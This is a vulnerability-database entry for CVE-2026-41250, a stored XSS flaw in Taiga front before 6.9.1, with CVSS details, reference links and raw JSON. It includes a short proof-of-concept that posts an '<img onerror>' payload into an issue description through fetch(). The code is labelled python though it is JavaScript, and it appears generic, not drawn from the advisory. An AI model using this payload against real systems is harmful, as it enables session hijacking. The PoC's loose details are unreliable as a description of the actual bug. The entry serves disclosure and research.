Security Vulnerability Report
中文
CVE-2026-41250 CVSS 5.7 MEDIUM

CVE-2026-41250

Published: 2026-05-11 18:16:34
Last Modified: 2026-05-11 18:16:34

Description

Taiga is a project management platform for startups and agile developers. Prior 6.9.1, Taiga front is vulnerable to stored XSS. This vulnerability is fixed in 6.9.1.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Taiga < 6.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept for Stored XSS in Taiga < 6.9.1 // Attacker injects payload into a vulnerable field (e.g., Issue description) var payload = '<img src=x onerror=alert(document.cookie)>'; // Simulated request to create/update an issue fetch('/api/v1/issues', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <ATTACKER_TOKEN>' }, body: JSON.stringify({ "subject": "Urgent Issue", "description": payload }) }); // When an admin views this issue, the alert triggers, demonstrating cookie theft.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41250", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:33.837", "lastModified": "2026-05-11T18:16:33.837", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taiga is a project management platform for startups and agile developers. Prior 6.9.1, Taiga front is vulnerable to stored XSS. This vulnerability is fixed in 6.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/taigaio/taiga-front/commit/a9ab31a2f184a2f5da3644829f0caa7ac6f22a4a", "source": "[email protected]"}, {"url": "https://github.com/taigaio/taiga-front/security/advisories/GHSA-fpm6-3pvx-3c46", "source": "[email protected]"}]}}